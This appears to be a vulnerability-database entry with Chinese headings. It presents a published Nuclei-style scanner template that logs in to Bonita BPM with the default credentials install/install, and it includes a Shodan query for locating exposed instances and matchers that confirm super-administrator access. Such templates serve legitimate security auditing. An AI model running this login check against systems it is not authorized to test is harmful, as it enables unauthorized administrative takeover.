漏洞描述
Bonita login was using default credentials which can led to gain super administrator access.
bonita-default-login: Bonita - Default Login
PoC代码[已公开]
id: bonita-default-login
info:
name: Bonita - Default Login
author: DhiyaneshDk
severity: high
description: |
Bonita login was using default credentials which can led to gain super administrator access.
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1197926023
tags: bonita,default-login,misconfig,vuln
variables:
username: install
password: install
http:
- raw:
- |
POST /bonita/loginservice?redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&_l=en
host-redirects: true
max-redirects: 4
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Layout Without Menu"
- "bonitasoft.ui.services"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f3810f3c1406a48b55552d10c8a22a6e0a9eadaf4ab10dea46300e74ec63fc2002210084cff8fb9cbf8bc18e00967cef8a8abd3ecd24bd489a54c3e66819e716e18cd6:922c64590222798bb761d5b6d8e72950